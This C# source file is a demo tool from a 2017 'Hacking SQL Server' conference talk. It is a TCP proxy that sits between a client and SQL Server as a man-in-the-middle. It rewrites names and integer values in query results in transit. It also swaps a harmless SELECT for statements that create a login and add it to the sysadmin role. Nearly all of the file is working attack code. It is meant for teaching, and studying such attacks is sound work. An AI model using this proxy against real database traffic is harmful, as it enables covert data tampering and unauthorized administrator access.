﻿/* 
    SQL Saturday #626 Budapest
	Hacking SQL Server
    2017-05-06 (version 1.29)
    AyTCPProxy demo tool
    André Melancia
    http://Andy.PT

    (C) 2016-2017, André Melancia
    
    
           ________   ________    _________  ____________;_
          - ______ \ - ______ \ / _____   //.  .  ._______/
         / /     / // /     / //_/     / // ___   /
        / /     / // /     / /       .-'//_/|_/,-'
       / /     / // /     / /     .-'.-'
      / /     / // /     / /     / /
     / /     / // /     / /     / /
    / /_____/ // /_____/ /     / /
    \________- \________-     /_/
         

    Additional copyright notice:
    Some code snippets were available public domain online.
    I was unable to assert the original author's names, copyright
    information or sharing restrictions on those code snippets.
    Having said that, thank you for your code ;)


--  +----------------------------------------------------------------+
--  | MISSION BRIEFING                                               |
--  +----------------------------------------------------------------+

    Include this file on an EMPTY C# Console Application (classic
    desktop) project and run it along with the SQL Script.

    Change the configuration IPs and ports in the Main() function.
    Change de find/replace values in the OnDataReceive() function.


*/

using System;
using System.Text;
using System.Net;
using System.Net.Sockets;
 
namespace AyTCPProxy
{
    class AyTCPProxy
    {
        static void Main(string[] args)
        {

            // +-----------------------------------------------------+
            // | Configuration values                                |
            // +-----------------------------------------------------+

            // If you compile this app, use this to get command prompt parameters
            //String Param_Source_IP        = args[0];
            //String Param_Source_Port      = args[1];
            //String Param_Destination_IP   = args[2];
            //String Param_Destination_Port = args[3];
            
            String Param_Source_IP        = "127.0.0.1";
            String Param_Source_Port      = "12345";          // The port you should connect to on this local machine to simulate a ManInTheMiddle attack
            String Param_Destination_IP   = "127.0.0.1";      // YOUR SQL Server DE machine IP
            String Param_Destination_Port = "1433";           // YOUR SQL Server DE port (default is 1433)


            // +-----------------------------------------------------+
            // | End of configuration                                |
            // +-----------------------------------------------------+

            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine   ("SQL Saturday #626 Budapest\r\n"
                               + "Hacking SQL Server\r\n"
                               + "2017-05-06 (version 1.29)\r\n"
                               + "AyTCPProxy demo tool\r\n"
                               + "André Melancia\r\n"
                               + "http://Andy.PT\r\n\r\n"
                               + "(C) 2016-2017, André Melancia\r\n"
                               + "\r\n"
                               + "       ________   ________    _________  ____________;_\r\n"
                               + "      - ______ \\ - ______ \\ / _____   //.  .  ._______/\r\n"
                               + "     / /     / // /     / //_/     / // ___   /\r\n"
                               + "    / /     / // /     / /       .-'//_/|_/,-'\r\n"
                               + "   / /     / // /     / /     .-'.-'\r\n"
                               + "  / /     / // /     / /     / /\r\n"
                               + " / /     / // /     / /     / /\r\n"
                               + "/ /_____/ // /_____/ /     / /\r\n"
                               + "\\________- \\________-     /_/\r\n"
                              );

            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine("AyTCPProxy...");
            Console.WriteLine("Source      = " + Param_Source_IP + " : " + Param_Source_Port);
            Console.WriteLine("Destination = " + Param_Destination_IP + " : " + Param_Destination_Port);
            Console.WriteLine("--------------------------------------------------");
            
            // Start the proxy
            new TcpForwarderSlim().Start(new IPEndPoint(IPAddress.Parse(Param_Source_IP),      int.Parse(Param_Source_Port)),
                                         new IPEndPoint(IPAddress.Parse(Param_Destination_IP), int.Parse(Param_Destination_Port))
                                        );
        } // Main()
    } // class AyTCPProxy



    public class TcpForwarderSlim
    {
        private readonly Socket MainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
        public void Start(IPEndPoint local, IPEndPoint remote)
        {
            Console.WriteLine("Start");
            MainSocket.Bind(local);
            MainSocket.Listen(10);

            while (true)
            {
                Console.WriteLine("Pre Accept");
                var source = MainSocket.Accept();
                Console.WriteLine("Post Accept");
                var destination = new TcpForwarderSlim();
                var state = new State(source, destination.MainSocket);
                destination.Connect(remote, source);
                source.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state);
            }
        }

        private void Connect(EndPoint remoteEndpoint, Socket destination)
        {
            Console.WriteLine("Connect");
            var state = new State(MainSocket, destination);
            MainSocket.Connect(remoteEndpoint);
            MainSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, SocketFlags.None, OnDataReceive, state);
        } // Connect()

        private static void OnDataReceive(IAsyncResult result)
        {
            Console.Write("OnDataReceive: ");

            var state = (State)result.AsyncState;
            try
            {
                var bytesRead = state.SourceSocket.EndReceive(result);
                Console.WriteLine(bytesRead);
                if (bytesRead > 0)
                {
                    if (bytesRead > 250)
                    {
                        Console.ForegroundColor = ConsoleColor.White;
                        Console.WriteLine (Encoding.Default.GetString (state.Buffer, 0, bytesRead).Replace ("\0", "¸"));
                        Console.ForegroundColor = ConsoleColor.Green;
                    }

                    if (bytesRead > 100)
                    { 
                        // +-----------------------------------------------------+
                        // | MANIPULATE PACKETS HERE                             |
                        // +-----------------------------------------------------+

                        // DEMO 2A
                        String FindString = "David Niven";
                        String Exploit    = "ERIKA      "; // fill excess with spaces (must have same length)

                        AyArrayReplace_ByteArray(state, AyStringToByteArray(FindString), AyStringToByteArray(Exploit), 0);


                        // DEMO 2B
                        FindString = "George Lazenby";
                        Exploit    = "AUSTIN POWERS "; // fill excess with spaces (must have same length)

                        AyArrayReplace_ByteArray(state, AyStringToByteArray(FindString), AyStringToByteArray(Exploit), 0);

                        
                        // DEMO 2C
                        byte[] FindBuffer    = new byte[] { (byte) 'S', 0,
                                                            (byte) 'e', 0,
                                                            (byte) 'a', 0,
                                                            (byte) 'n', 0,
                                                            (byte) 0x36, 0x36, 0x36, 0x00  
                                                                   // 3552822 = 0x363636 = "36 36 36 00" little endian
                                                          };

                        byte[] ExploitBuffer = new byte[] { (byte) 'S', 0,
                                                            (byte) 'e', 0,
                                                            (byte) 'a', 0,
                                                            (byte) 'n', 0,
                                                            (byte) 0x00, 0xCA, 0x9A, 0x3B
                                                                  // 1000000000 = 0x3B9ACA00 = "00 CA 9A 3B" little endian
                                                          };

                        AyArrayReplace_ByteArray (state, FindBuffer, ExploitBuffer, 0);
       

                        // DEMO 3
                        FindString = "SELECT 'EscalationExample Demo'"; 
                        Exploit    = "CREATE LOGIN    AustinPowers    WITH PASSWORD = 'ThisIsAReallyLongPassw0rd!'; "
                                   + "ALTER SERVER ROLE sysadmin ADD MEMBER      AustinPowers      ; "
                                   + "SELECT 'SHAGADELIC exploit successful!', GetDate();  -- ";
                                   // remaining bytes are taken from the comments (let's assume it's a big query string)

                        AyArrayReplace_ByteArray(state, AyStringToByteArray(FindString), AyStringToByteArray(Exploit), 0);


                        // +-----------------------------------------------------+
                        // | MANIPULATE DIRECT BYTES HERE (INTEGER, DATES, ETC.) |
                        // +-----------------------------------------------------+

                        /*
                            // This is how you can change binary values (leaving it for example only) 
                            byte[] NameFind    = new byte[] { (byte) 'G', 0,
                                                              (byte) 'e', 0,
                                                              (byte) 'o', 0,
                                                              (byte) 'r', 0,
                                                              (byte) 'g', 0,
                                                              (byte) 'e', 0,
                                                              (byte) ' ', 0,
                                                              (byte) 'L', 0,
                                                              (byte) 'a', 0,
                                                              (byte) 'z', 0,
                                                              (byte) 'e', 0,
                                                              (byte) 'n', 0,
                                                              (byte) 'b', 0,
                                                              (byte) 'y' };

                            byte[] NameReplace = new byte[] { (byte) 'Z', 0,
                                                              (byte) 'É', 0,
                                                              (byte) ' ', 0,
                                                              (byte) 'P', 0,
                                                              (byte) 'O', 0,
                                                              (byte) 'V', 0,
                                                              (byte) 'I', 0,
                                                              (byte) 'N', 0,
                                                              (byte) 'H', 0,
                                                              (byte) 'O', 0,
                                                              (byte) ' ', 0,
                                                              (byte) ' ', 0,
                                                              (byte) ' ', 0,
                                                              (byte) ' ' };

                            AyArrayReplace_ByteArray(state, NameFind, NameReplace, 0);
                            */

                        // +-----------------------------------------------------+
                        // | END OF MANIPULATION STUFF                           |
                        // +-----------------------------------------------------+
                    }

                    state.DestinationSocket.Send(state.Buffer, bytesRead, SocketFlags.None);
                    state.SourceSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state);
                }
            }
            catch
            {
                state.DestinationSocket.Close();
                state.SourceSocket.Close();
            }
        } // OnDataReceive()


        static int AyArrayReplace_ByteArray (State ioState, byte[] inOriginal, byte[] inReplacement, int inOffset)
        {

            int FoundAt = AyArraySearch(ioState.Buffer, inOriginal);
            if (FoundAt >= 0 && inReplacement != null)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine ("NAME FOUND >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>");
                Array.Copy (inReplacement, 0, ioState.Buffer, FoundAt + inOffset, inReplacement.Length);
                Console.WriteLine ("NAME REPLACED <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<");
                Console.ForegroundColor = ConsoleColor.Green;
                System.Threading.Thread.Sleep (300); // just for display ;)
            }

            return (FoundAt);
        } // AyArrayReplace_ByteArray()


        static byte[] AyStringToByteArray (String inString)
        {

            byte[] Out = new byte[inString.Length * 2];
            //System.Buffer.BlockCopy(str.ToCharArray(), 0, bytes, 0, bytes.Length);
            
            for (int n = 0; n < inString.Length; n++)
            {
                Out[n * 2] = (byte)inString[n];
                Out[n * 2 + 1] = 0;
            }

            return (Out);
        } // AyStringToByteArray()



        static int AyArraySearch(byte[] haystack, byte[] needle)
        {
            for (int i = 0; i <= haystack.Length - needle.Length; i++)
            {
                if (AyArrayMatch(haystack, needle, i))
                {
                    return i;
                }
            }
            return -1;
        } // AyArraySearch()

        public static bool AyArrayMatch(byte[] haystack, byte[] needle, int start)
        {
            if (needle.Length + start > haystack.Length)
            {
                return false;
            }
            else
            {
                for (int i = 0; i < needle.Length; i++)
                {
                    if (needle[i] != haystack[i + start])
                    {
                        return false;
                    }
                }
                return true;
            }
        } //AyArrayMatch()

        private class State
        {
            public Socket SourceSocket { get; private set; }
            public Socket DestinationSocket { get; private set; }
            public byte[] Buffer { get; private set; }

            public State(Socket source, Socket destination)
            {
                SourceSocket = source;
                DestinationSocket = destination;
                Buffer = new byte[8192];
            } // State()
        } // private class State()

    } //  class TcpForwarderSlim

} // namespace AyTCPProxy





